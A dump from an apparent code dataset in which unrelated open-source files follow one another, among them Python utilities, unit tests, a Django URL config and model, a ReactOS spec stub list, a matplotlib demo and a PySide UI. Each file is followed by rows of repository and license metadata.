l = []
if not self._is_flat_(lst):
for item in lst:
if self._lazy_:
deferred = True
else:
deferred = False
l.append(DynamicAccessor(item, lazy=self._lazy_,
deferred=deferred))
else:
for item in lst:
if isinstance(item, dict):
l.append(self._format_dict_(item))
else:
l.append(item)
return l
def _format_dict_(self, dct):
if len(dct.keys()) == 1:
for v in dct.values():
return v
else:
if self._lazy_:
deferred = True
else:
deferred = False
return DynamicAccessor(dct, lazy=self._lazy_,
deferred=deferred)
def _add_child_get_func_(self, data):
if isinstance(data, list):
for i in data:
if isinstance(i, dict):
for a,d in i.items():
self._add_get_func_(a,d, parent=False)
elif isinstance(data, dict):
for a,d in data.items():
self._add_get_func_(a,d, parent=False)
def _append_get_func_(self, attr, data):
try:
instance = getattr(self, 'get'+attr)
nattr = attr
except AttributeError:
nattr = self._make_plural_(attr)
instance = getattr(self, 'aggr'+nattr)
if not isinstance(instance._data_, list):
instance._data_ = [instance._data_, ]
if isinstance(data, list) and len (data) == 1:
data = data[0]
if not isinstance(data, dict):
instance._data_.append(data)
else:
newdata = {}
for k,v in data.items():
for item in instance._data_:
if not item:
continue
if k not in item:
if not k in newdata:
newdata[k] = [v,]
else:
newdata[k].append(v)
elif k in item:
if not k in newdata:
newdata[k] = []
if not isinstance(item[k], list):
item[k] = [item[k], ]
for i in item[k]:
newdata[k].append(i)
if isinstance(v, list) and len(v) == 1:
newdata[k].append(v[0])
else:
newdata[k].append(v)
if newdata:
instance._data_ = newdata
if hasattr(self, 'get'+attr):
newinstance = deepcopy(instance)
delattr(self, 'get'+attr)
plural_attr = self._make_plural_(attr)
setattr(self, 'aggr'+plural_attr, newinstance)
def _add_getby_func_(self, attr, data):
for item in data:
for chattr, chdata in item.items():
function = self._get_match_func_(chattr, data)
parent = self._format_attr_name_(attr)
child = self._format_attr_name_(chattr)
setattr(self, 'get'+parent+'By'+child, deepcopy(function))
def _get_match_func_(self, attr, data):
def function(value, raw=False):
matches = []
for item in data:
if attr not in item:
continue
if isinstance(item[attr], (str, int, float, bool)):
if self._match_str_(item[attr], value):
matches.append(item)
elif isinstance(item[attr], list):
if self._match_list_(item[attr], value):
matches.append(item)
else:
for i in item[attr]:
if isinstance(i, dict):
if self._match_dict_(i, value):
matches.append(item)
elif isinstance(item[attr], dict):
if self._match_dict_(item[attr], value):
matches.append(item)
if raw:
return matches
else:
if self._lazy_:
deferred = True
else:
deferred = False
return DynamicAccessor(matches, lazy=self._lazy_,
deferred=deferred)
return function
def _match_str_(self, string, value):
if string == value:
return True
else:
return False
def _match_list_(self, lst, value):
if value in lst:
return True
else:
return False
def _match_dict_(self, dct, value):
if isinstance(value, dict):
for k,v in value.items():
if k in dct:
if v == dct[k] or \
isinstance(dct[k], list) and v in dct[k]:
return True
else:
if len(dct.keys()) != 1:
raise LookupError('Too many fields; cannot disambiguate.')
for v in dct.values():
if value == v or \
isinstance(v, list) and value in v:
return True
return False
def _format_attr_name_(self, attr):
for num, i in enumerate(attr):
if re.match('[a-zA-Z]', i):
attr = attr[:num] + attr[num].upper() + attr[num+1:]
break
seg = attr.split('_')
if len(seg) > 1:
attr = ''
for s in seg:
if s == '':
attr += '_'
else:
attr += s[0].upper() + s[1:]
attr = attr.replace('@', 'Arobase')
attr = attr.replace('#', 'Hash')
return attr
def _make_plural_(self, attr):
if not attr.endswith('s'):
if attr.endswith('y') and \
attr[-2] not in ('a','e','i','o','u'):
attr = attr[:-1] + 'ies'
else:
attr += 's'
elif attr.endswith('ss'):
attr += 'es'
return attr
def _is_flat_(self, data):
if isinstance(data, list):
for item in data:
if isinstance(item, (dict, list)):
if not self._is_flat_(item):
return False
return True
elif isinstance(data, dict):
for k,v in data.items():
if isinstance(v, (dict, list)):
return False
return True
|
UTF-8
|
Python
| false | false | 2,014 |
7,559,142,443,535 |
8689581c7fef4d6848d33bcf8054ad5aa2aa042f
|
f876cb962f090937205dfa60750b19305fa53c42
|
/test/com/zhyfoundry/spider/SpiderTest.py
|
f1ed6935f3c384de5a4b171090340396d04d8c9e
|
[
"LGPL-2.1-or-later",
"GPL-1.0-or-later",
"GPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-only"
] |
non_permissive
|
atealxt/web-crawler
|
https://github.com/atealxt/web-crawler
|
a0dd38d30c3010dfe0aca8344a0ae4d1760eeef7
|
ea98f60befbf0fc9993e1a257e2421dcab76b42f
|
refs/heads/master
| 2021-01-23T07:20:50.440992 | 2013-07-16T06:16:10 | 2013-07-16T06:16:10 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import unittest
from com.zhyfoundry.spider import Spider
class SpiderTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testCrawl(self):
c = Spider.Spider()
c.crawl()
pass
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
UTF-8
|
Python
| false | false | 2,013 |
12,764,642,813,345 |
b40f0ca5c35ac68f497166c839563478e10a83df
|
f03d5e1e89724d1537b241c780a45eab342b6b67
|
/depot/scripts/urls.py
|
d85aa80bb6b5cb0db076ec25c8ac0b0ba709d5fd
|
[] |
no_license
|
doubleshow/sikulidepot
|
https://github.com/doubleshow/sikulidepot
|
c63e1bff46cdf2cde607b6039f28ca3fb25ce6dd
|
16e8d61e0fd2000c7c3df2f8359e036f9831641d
|
refs/heads/master
| 2021-01-15T14:28:35.441851 | 2011-01-08T13:56:05 | 2011-01-08T13:56:05 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.conf.urls.defaults import *
urlpatterns = patterns('scripts.views',
# Example:
# (r'^sikulirepo/', include('sikulirepo.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# (r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# (r'^admin/', include(admin.site.urls)),
(r'^$', 'index'),
(r'^(?P<script_id>\d+)/$', 'detail'),
(r'^(?P<script_id>\d+)/update/$', 'update'),
(r'^(?P<script_id>\d+)/showsource/$', 'showsource'),
(r'^upload_file/$', 'upload_file'),
)
|
UTF-8
|
Python
| false | false | 2,011 |
15,006,615,769,191 |
2afc1a9e58cfb63ae2439a3600f392a7f8f6685d
|
ba41f812870e22b71957dbf3c90cf83a41d250fc
|
/reactos/dll/win32/rasman/rasman.spec
|
32774c7a8a243c3331610973bf1b234769e92c72
|
[
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.1-only",
"BSD-2-Clause",
"LGPL-3.0-only",
"GPL-3.0-only"
] |
non_permissive
|
hoangduit/reactos
|
https://github.com/hoangduit/reactos
|
2826b98902401bcdcee625ccf435f8db639f6c4f
|
63682957b86d77c7d82e7b887797ef82ea92d271
|
refs/heads/master
| 2021-01-23T03:28:31.646642 | 2014-12-29T21:35:51 | 2014-12-29T21:35:51 | 39,994,765 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
@ stub DwRasGetHostByName
@ stub IsRasmanProcess
@ stub RasActivateRoute
@ stub RasActivateRouteEx
@ stub RasAddConnectionPort
@ stub RasAddNotification
@ stub RasAllocateRoute
@ stub RasBundleClearStatistics
@ stub RasBundleClearStatisticsEx
@ stub RasBundleGetPort
@ stub RasBundleGetStatistics
@ stub RasBundleGetStatisticsEx
@ stub RasCompressionGetInfo
@ stub RasCompressionSetInfo
@ stub RasConnectionEnum
@ stub RasConnectionGetStatistics
@ stub RasCreateConnection
@ stub RasDeAllocateRoute
@ stub RasDestroyConnection
@ stub RasDeviceConnect
@ stub RasDeviceEnum
@ stub RasDeviceGetInfo
@ stub RasDeviceSetInfo
@ stub RasDoIke
@ stub RasEnableIpSec
@ stub RasEnableRasAudio
@ stub RasEnumConnectionPorts
@ stub RasEnumLanNets
@ stub RasFindPrerequisiteEntry
@ stub RasFreeBuffer
@ stub RasGetBandwidthUtilization
@ stub RasGetBuffer
@ stub RasGetCalledIdInfo
@ stub RasGetConnectInfo
@ stub RasGetConnectionParams
@ stub RasGetConnectionUserData
@ stub RasGetCustomScriptDll
@ stub RasGetDevConfig
@ stub RasGetDevConfigEx
@ stub RasGetDeviceConfigInfo
@ stub RasGetDeviceName
@ stub RasGetDeviceNameW
@ stub RasGetDialParams
@ stub RasGetEapUserInfo
@ stub RasGetFramingCapabilities
@ stub RasGetHConnFromEntry
@ stub RasGetHportFromConnection
@ stub RasGetInfo
@ stub RasGetInfoEx
@ stub RasGetKey
@ stub RasGetNdiswanDriverCaps
@ stub RasGetNumPortOpen
@ stub RasGetPortUserData
@ stub RasGetProtocolInfo
@ stub RasGetTimeSinceLastActivity
@ stub RasGetUnicodeDeviceName
@ stub RasGetUserCredentials
@ stub RasInitialize
@ stub RasInitializeNoWait
@ stub RasIsIpSecEnabled
@ stub RasIsTrustedCustomDll
@ stub RasLinkGetStatistics
@ stub RasPnPControl
@ stub RasPortBundle
@ stub RasPortCancelReceive
@ stub RasPortClearStatistics
@ stub RasPortClose
@ stub RasPortConnectComplete
@ stub RasPortDisconnect
@ stub RasPortEnum
@ stub RasPortEnumProtocols
@ stub RasPortFree
@ stub RasPortGetBundle
@ stub RasPortGetBundledPort
@ stub RasPortGetFramingEx
@ stub RasPortGetInfo
@ stub RasPortGetProtocolCompression
@ stub RasPortGetStatistics
@ stub RasPortGetStatisticsEx
@ stub RasPortListen
@ stub RasPortOpen
@ stub RasPortOpenEx
@ stub RasPortReceive
@ stub RasPortReceiveEx
@ stub RasPortRegisterSlip
@ stub RasPortReserve
@ stub RasPortRetrieveUserData
@ stub RasPortSend
@ stub RasPortSetFraming
@ stub RasPortSetFramingEx
@ stub RasPortSetInfo
@ stub RasPortSetProtocolCompression
@ stub RasPortStoreUserData
@ stub RasPppCallback
@ stub RasPppChangePassword
@ stub RasPppGetEapInfo
@ stub RasPppGetInfo
@ stub RasPppRetry
@ stub RasPppSetEapInfo
@ stub RasPppStart
@ stub RasPppStarted
@ stub RasPppStop
@ stub RasProtocolEnum
@ stub RasRPCBind
@ stub RasRefConnection
@ stub RasReferenceCustomCount
@ stub RasReferenceRasman
@ stub RasRefreshKerbCreds
@ stub RasRegisterPnPEvent
@ stub RasRegisterPnPHandler
@ stub RasRegisterRedialCallback
@ stub RasRequestNotification
@ stub RasRpcConnect
@ stub RasRpcConnectServer
@ stub RasRpcDeleteEntry
@ stub RasRpcDeviceEnum
@ stub RasRpcDisconnect
@ stub RasRpcDisconnectServer
@ stub RasRpcEnumConnections
@ stub RasRpcGetCountryInfo
@ stub RasRpcGetDevConfig
@ stub RasRpcGetErrorString
@ stub RasRpcGetInstalledProtocols
@ stub RasRpcGetInstalledProtocolsEx
@ stub RasRpcGetSystemDirectory
@ stub RasRpcGetUserPreferences
@ stub RasRpcGetVersion
@ stub RasRpcPortEnum
@ stub RasRpcPortGetInfo
@ stub RasRpcRemoteGetSystemDirectory
@ stub RasRpcRemoteGetUserPreferences
@ stub RasRpcRemoteRasDeleteEntry
@ stub RasRpcRemoteSetUserPreferences
@ stub RasRpcSetUserPreferences
@ stub RasRpcUnloadDll
@ stdcall RasSecurityDialogBegin(ptr ptr long ptr long ptr)
@ stdcall RasSecurityDialogComplete(ptr)
@ stdcall RasSecurityDialogGetInfo(ptr ptr)
@ stdcall RasSecurityDialogReceive(ptr ptr ptr long ptr)
@ stdcall RasSecurityDialogSend(ptr ptr long)
@ stub RasSendCreds
@ stub RasSendNotification
@ stub RasSendPppMessageToRasman
@ stub RasServerPortClose
@ stub RasSetAddressDisable
@ stub RasSetBapPolicy
@ stub RasSetCachedCredentials
@ stub RasSetCalledIdInfo
@ stub RasSetCommSettings
@ stub RasSetConnectionParams
@ stub RasSetConnectionUserData
@ stub RasSetDevConfig
@ stub RasSetDeviceConfigInfo
@ stub RasSetDialParams
@ stub RasSetEapLogonInfo
@ stub RasSetEapUserInfo
@ stub RasSetIoCompletionPort
@ stub RasSetKey
@ stub RasSetPortUserData
@ stub RasSetRasdialInfo
@ stub RasSetRouterUsage
@ stub RasSignalNewConnection
@ stub RasStartRasAutoIfRequired
@ stub RasmanUninitialize
|
UTF-8
|
Python
| false | false | 2,014 |
3,891,240,413,029 |
d79fb047a7c7996c27ae20c6c5410a7d8c985944
|
9e567b8241ce00e9d53843f5aba11c4a119b079f
|
/tags/v0_98_2/examples/pylab_examples/hexbin_demo.py
|
9e325ddeb5564c595fe531712767a7ceb42cc5d3
|
[
"LicenseRef-scancode-unknown-license-reference"
] |
non_permissive
|
neilpanchal/matplotlib
|
https://github.com/neilpanchal/matplotlib
|
3d2a7133e858c4eefbb6c2939eb3f7a328b18118
|
7565d1f2943e0e7b4a3f11ce692dfb9b548d0b83
|
refs/heads/master
| 2020-06-11T09:20:43.941323 | 2011-01-21T21:50:16 | 2011-01-21T21:50:16 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
hexbin is an axes method or pyplot function that is essentially
a pcolor of a 2-D histogram with hexagonal cells. It can be
much more informative than a scatter plot; in the first subplot
below, try substituting 'scatter' for 'hexbin'.
'''
from matplotlib.pyplot import *
import numpy as np
n = 100000
x = np.random.standard_normal(n)
y = 2.0 + 3.0 * x + 4.0 * np.random.standard_normal(n)
xmin = x.min()
xmax = x.max()
ymin = y.min()
ymax = y.max()
subplot(121)
hexbin(x,y)
axis([xmin, xmax, ymin, ymax])
title("Hexagon binning")
cb = colorbar()
cb.set_label('counts')
subplot(122)
hexbin(x,y,bins='log')
axis([xmin, xmax, ymin, ymax])
title("With a log color scale")
cb = colorbar()
cb.set_label('log10(N)')
show()
|
UTF-8
|
Python
| false | false | 2,011 |
4,501,125,775,900 |
5e4a45a187c280c0ef85eb75fe640144691d5e96
|
80a3cc2ebd27f730bcced6f7bc5030017153a950
|
/code/cython-darwin/setup.py
|
26b977ea3cb783c7b4a760d71d42ab13ec54b68a
|
[
"GPL-1.0-or-later"
] |
non_permissive
|
nealholt/wild-black-yonder
|
https://github.com/nealholt/wild-black-yonder
|
cc2ecfa3c53a9666cbb364dcaccb64566ff68f37
|
bc490b99f52a013432d6304be83d4aca963ae63f
|
refs/heads/master
| 2021-01-01T17:15:56.434118 | 2014-01-17T15:08:16 | 2014-01-17T15:08:16 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#http://docs.cython.org/src/userguide/tutorial.html
#run with:
#> python setup.py build_ext --inplace
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
ext_modules = [Extension("cygeometry", ["cygeometry.pyx"])#,
#Extension("c1", ["c1.pyx"]),
#Extension("c2", ["c2.pyx"]),
#Extension("c3", ["c3.pyx"]),
#Extension("csum", ["csum.pyx"])
]
setup(
name = 'Cython Test Scripts',
cmdclass = {'build_ext': build_ext},
ext_modules = ext_modules
)
|
UTF-8
|
Python
| false | false | 2,014 |
12,461 |
4a85dd8f19d0bea022a0a5ef189f1fa7027b504f
|
b6f92e39ae1d67bbbaec6991d31106e44dd54c7e
|
/test_aic.py
|
4a729310199576e3df927edbc451571a8211dbb2
|
[
"LGPL-2.1-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-only",
"GPL-2.0-or-later"
] |
non_permissive
|
rollovercable/tu_aic_13
|
https://github.com/rollovercable/tu_aic_13
|
f953dd1769396030450f1208f25080377f44e06c
|
d43b5087e2e8e35801b2f47ac5f1f6d7d74dce01
|
refs/heads/master
| 2021-01-12T22:22:52.581633 | 2014-01-30T11:50:24 | 2014-01-30T11:50:24 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os
import sys
sys.path.append(os.path.abspath('./wsgi'))
import random
import unittest
import json
import aic.app as app
import aic.db as db
class AICTestCase(unittest.TestCase):
def setUp(self):
self.app = app.application.test_client()
session = db.Session()
self.keyword = db.Keyword("Testkeyword" + str(random.randint(0,1000000000)))
session.add(self.keyword)
session.commit()
self.project = db.Project("", "")
session.add(self.project)
session.commit()
self.task = db.Task(self.project, self.keyword, "")
self.task.answers_requested = 1
session.add(self.task)
session.commit()
def test_post_answer_bad_task(self):
data = json.dumps({'answer': 'positive', 'user': "testuser"})
response = self.app.post('/api/task/0/answers', data=data)
self.assertEquals(response.status_code, 404)
def test_post_answer_bad_data(self):
data = "bad_data"
response = self.app.post('/api/task/%s/answers' % self.task.id, data=data)
self.assertEquals(response.status_code, 400)
def test_post_answer(self):
data = json.dumps({'answer': 'positive', 'user': "testuser"})
response = self.app.post('/api/task/%s/answers' % self.task.id, data=data)
self.assertEquals(response.status_code, 200)
if __name__ == '__main__':
unittest.main()
|
UTF-8
|
Python
| false | false | 2,014 |
12,232,066,878,683 |
24e08185800982cd8552b1e5f4fd1fd3a6ca59ad
|
4e2dea834ae30124966faa34c5eedfff40ada6a6
|
/experimental/tools/scoremanagertools/iotools/Menu/test/test_Menu_toggle_menu_commands.py
|
0cf0a02dc3275c52afef4bc9cb92b52b0788616f
|
[
"GPL-3.0-or-later",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-3.0-only",
"LGPL-2.1-or-later",
"AGPL-3.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference"
] |
non_permissive
|
adorsk/abjad
|
https://github.com/adorsk/abjad
|
511dda74321abaff3fb5517ea88b2e410c95c17b
|
6664257cd396b607707c3836500e30c5b0daa20b
|
refs/heads/master
| 2020-12-25T22:36:52.886482 | 2014-01-17T02:13:32 | 2014-01-17T02:13:32 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- encoding: utf-8 -*-
from experimental import *
def test_Menu_toggle_menu_commands_01():
score_manager = scoremanagertools.scoremanager.ScoreManager()
score_manager._run(pending_user_input='tmc q')
starting_menu_lines = score_manager.session.io_transcript[0][1]
modified_menu_lines = score_manager.session.io_transcript[2][1]
new_score_menu_line = ' new score (new)'
assert new_score_menu_line in starting_menu_lines
assert not new_score_menu_line in modified_menu_lines
|
UTF-8
|
Python
| false | false | 2,014 |
4,432,406,297,248 |
4477a5b54d68c76e521d251aa066a803a73d98c9
|
89e8a5e404e168115dc4edd270bedec80a84111d
|
/pyside_ui/navigator_ui.py
|
035645ea289f93b86fa303d8e5015cc0d79ab3f5
|
[
"MIT"
] |
permissive
|
alaindomissy/cadnano_navigator
|
https://github.com/alaindomissy/cadnano_navigator
|
5e96511addf3e8bb08198d35055c9bd3f3915058
|
9b6ea2af0f8465587f02cbf41f2b1dfe8c8f91d3
|
refs/heads/master
| 2020-12-24T10:56:07.802831 | 2014-05-14T20:15:39 | 2014-05-14T20:15:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'navigator.ui'
#
# Created: Tue May 13 17:46:18 2014
# by: pyside-uic 0.2.14 running on PySide 1.1.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(470, 236)
self.verticalLayoutWidget = QtGui.QWidget(Dialog)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(9, 0, 451, 221))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtGui.QLabel(self.verticalLayoutWidget)
self.label.setEnabled(True)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.label_2 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.gridLayout_2 = QtGui.QGridLayout()
self.gridLayout_2.setSizeConstraint(QtGui.QLayout.SetDefaultConstraint)
self.gridLayout_2.setContentsMargins(10, -1, 10, -1)
self.gridLayout_2.setObjectName("gridLayout_2")
self.follow3pButton = QtGui.QPushButton(self.verticalLayoutWidget)
self.follow3pButton.setFocusPolicy(QtCore.Qt.StrongFocus)
self.follow3pButton.setAutoDefault(False)
self.follow3pButton.setObjectName("follow3pButton")
self.gridLayout_2.addWidget(self.follow3pButton, 0, 2, 1, 1)
self.follow5pButton = QtGui.QPushButton(self.verticalLayoutWidget)
self.follow5pButton.setFocusPolicy(QtCore.Qt.StrongFocus)
self.follow5pButton.setAutoDefault(False)
self.follow5pButton.setObjectName("follow5pButton")
self.gridLayout_2.addWidget(self.follow5pButton, 0, 0, 1, 1)
self.centerOnStrandButton = QtGui.QPushButton(self.verticalLayoutWidget)
self.centerOnStrandButton.setFocusPolicy(QtCore.Qt.StrongFocus)
self.centerOnStrandButton.setAutoDefault(False)
self.centerOnStrandButton.setObjectName("centerOnStrandButton")
self.gridLayout_2.addWidget(self.centerOnStrandButton, 0, 1, 1, 1)
self.verticalLayout.addLayout(self.gridLayout_2)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.label_6 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_6.setObjectName("label_6")
self.verticalLayout.addWidget(self.label_6)
self.gridLayout_6 = QtGui.QGridLayout()
self.gridLayout_6.setContentsMargins(10, -1, 10, -1)
self.gridLayout_6.setObjectName("gridLayout_6")
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Minimum)
self.gridLayout_6.addItem(spacerItem1, 0, 2, 1, 1)
self.centerOnSelectedButton = QtGui.QPushButton(self.verticalLayoutWidget)
self.centerOnSelectedButton.setFocusPolicy(QtCore.Qt.StrongFocus)
self.centerOnSelectedButton.setAutoDefault(False)
self.centerOnSelectedButton.setObjectName("centerOnSelectedButton")
self.gridLayout_6.addWidget(self.centerOnSelectedButton, 0, 1, 1, 1)
spacerItem2 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Minimum)
self.gridLayout_6.addItem(spacerItem2, 0, 0, 1, 1)
self.verticalLayout.addLayout(self.gridLayout_6)
spacerItem3 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem3)
self.label_3 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_3.setObjectName("label_3")
self.verticalLayout.addWidget(self.label_3)
self.gridLayout_5 = QtGui.QGridLayout()
self.gridLayout_5.setContentsMargins(10, -1, 10, -1)
self.gridLayout_5.setObjectName("gridLayout_5")
self.label_4 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_4.setObjectName("label_4")
self.gridLayout_5.addWidget(self.label_4, 0, 0, 1, 1)
self.activeBaseIndexInput = QtGui.QLineEdit(self.verticalLayoutWidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.activeBaseIndexInput.sizePolicy().hasHeightForWidth())
self.activeBaseIndexInput.setSizePolicy(sizePolicy)
self.activeBaseIndexInput.setObjectName("activeBaseIndexInput")
self.gridLayout_5.addWidget(self.activeBaseIndexInput, 0, 1, 1, 1)
self.sliceToSelectedButton = QtGui.QPushButton(self.verticalLayoutWidget)
self.sliceToSelectedButton.setFocusPolicy(QtCore.Qt.StrongFocus)
self.sliceToSelectedButton.setAutoDefault(False)
self.sliceToSelectedButton.setObjectName("sliceToSelectedButton")
self.gridLayout_5.addWidget(self.sliceToSelectedButton, 0, 2, 1, 1)
self.verticalLayout.addLayout(self.gridLayout_5)
spacerItem4 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem4)
self.verticalLayout.setStretch(9, 1)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "caDNAno Navigator", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Dialog", "Navigate the cadnano view:", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Dialog", "Center on oligo strands:", None, QtGui.QApplication.UnicodeUTF8))
self.follow3pButton.setText(QtGui.QApplication.translate("Dialog", "Follow 3p", None, QtGui.QApplication.UnicodeUTF8))
self.follow5pButton.setText(QtGui.QApplication.translate("Dialog", "Follow 5p", None, QtGui.QApplication.UnicodeUTF8))
self.centerOnStrandButton.setText(QtGui.QApplication.translate("Dialog", "Center strand", None, QtGui.QApplication.UnicodeUTF8))
self.label_6.setText(QtGui.QApplication.translate("Dialog", "Move around the pathview:", None, QtGui.QApplication.UnicodeUTF8))
self.centerOnSelectedButton.setText(QtGui.QApplication.translate("Dialog", "Center selected", None, QtGui.QApplication.UnicodeUTF8))
self.label_3.setText(QtGui.QApplication.translate("Dialog", "Active base index (slicer):", None, QtGui.QApplication.UnicodeUTF8))
self.label_4.setText(QtGui.QApplication.translate("Dialog", "Move to baseindex: ", None, QtGui.QApplication.UnicodeUTF8))
self.sliceToSelectedButton.setText(QtGui.QApplication.translate("Dialog", "Slice to selected", None, QtGui.QApplication.UnicodeUTF8))
|
UTF-8
|
Python
| false | false | 2,014 |
11,742,440,591,662 |
a168d12f30e21211e17352f053c6fdaae354493f
|
5ff2d2f8b3f6122fe9b9b783c40a7829b8e79dfd
|
/corpus.py
|
366c9a306f2bed63f74975d9bdc931df4b9b7569
|
[
"BSD-3-Clause"
] |
permissive
|
smrmkt/sample_mecab_word2vec
|
https://github.com/smrmkt/sample_mecab_word2vec
|
c6daa6ad837277fa8afa9b19fe700ea89e63081f
|
40c0eaace43a662c2efac8bb4ebd5179ef7ebab1
|
refs/heads/master
| 2016-09-06T12:35:45.061452 | 2014-04-20T10:32:31 | 2014-04-20T10:32:31 | 18,961,787 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
#-*- coding: utf-8 -*
import argparse
from lib.Parser import Parser
from lib.Vectorizer import Vectorizer
# 引数設定
parser = argparse.ArgumentParser()
parser.add_argument('menu')
parser.add_argument('in_path')
parser.add_argument('out_path', nargs='?')
def get_input():
pos = []
neg = []
for l in raw_input('\nplease input formula(or "END"): ').split('+'):
words = l.split('-')
pos.append(words[0])
for i in range(1, len(words)):
neg.append(words[i])
return pos, neg
if __name__ == '__main__':
args = parser.parse_args()
menu = args.menu
in_path = args.in_path
out_path = args.out_path
if menu == 'parse':
p = Parser('-Owakati')
p.parse_file(in_path, out_path)
elif menu == 'vectorize':
v = Vectorizer(min_count=10)
v.build_from_file(in_path)
v.store(out_path)
elif menu == 'calc':
v = Vectorizer()
v.load(in_path)
while True:
pos, neg = get_input()
if pos[0] == 'END':
break;
else:
v.calc(pos, neg)
|
UTF-8
|
Python
| false | false | 2,014 |
16,020,228,029,868 |
50fb2de104336750ec7acb4826cce5183466301e
|
8068feb8b12d2a26916def72c99a808332b0149f
|
/goose_extractor.py
|
977913031d0ad5ddf47c331e16d72b16a1db5dea
|
[] |
no_license
|
KeithYue/WebdataPipeline
|
https://github.com/KeithYue/WebdataPipeline
|
4e25d2d9dd7ad893d608f6a82dac9910b9edcd91
|
d2fb08887fb53f7b8dfbd511e79b6478407564de
|
refs/heads/master
| 2020-09-12T20:42:40.104460 | 2014-08-20T04:43:09 | 2014-08-20T04:43:09 | 20,519,131 | 1 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
import re
import time
import urllib2
from goose import Goose
from goose.text import StopWordsChinese
def extract_content(html):
g = Goose({'stopwords_class': StopWordsChinese})
article = g.extract(raw_html=html)
return article.cleaned_text
def test():
url = 'http://news.163.com/09/1109/02/5NL6V0VB000120GU.html'
raw_html = urllib2.urlopen(url).read()
print extract_content(raw_html)
if __name__=='__main__':
test()
|
UTF-8
|
Python
| false | false | 2,014 |
5,299,989,684,402 |
9de3486775ca3a31342e05f846e6aca8612e55d2
|
acd0614dcef13950135f36f97015fcf2890f53aa
|
/download/models.py
|
9c342e76d9d89918507633be3a85ba6aca6aaaaf
|
[] |
no_license
|
lxstar/fileserver_v2
|
https://github.com/lxstar/fileserver_v2
|
4158ddac570a82eacaaafd53b5011bd1352799fa
|
a5715f4aafdc8313f747b9184265eec100390afd
|
refs/heads/master
| 2020-03-27T03:10:11.317351 | 2014-07-23T06:52:23 | 2014-07-23T06:52:23 | 22,135,030 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# -----------------------------------------------------
# FileName: models.py
# Author : liuxing2@
# Project : fileserver.download
# Date : 2014-05-28 14:07
# Descrip : download object model
# -----------------------------------------------------
from django.db import models
class DownloadFileModel(models.Model):
"""
use:
save data to database from DownloadFileForm
"""
filetime = models.DateTimeField(auto_now_add=True)
filepath = models.CharField(max_length=500)
clientip = models.IPAddressField()
|
UTF-8
|
Python
| false | false | 2,014 |
3,350,074,519,395 |
ea490d726923c905aa780110eec8b1c81e210fdc
|
eba33d3257651c9f6b4c246ab74b6bf6934aa514
|
/myMongoDB.py
|
22de74c6bc9bfaae738deaa30d70a9ce612905ce
|
[] |
no_license
|
strocchia/Flask-myFood2.0
|
https://github.com/strocchia/Flask-myFood2.0
|
0ab0679b6562b168b40d8b46a4e16930f7960ae5
|
a973220388fc709aa96a16fa4c03c817d0703101
|
refs/heads/master
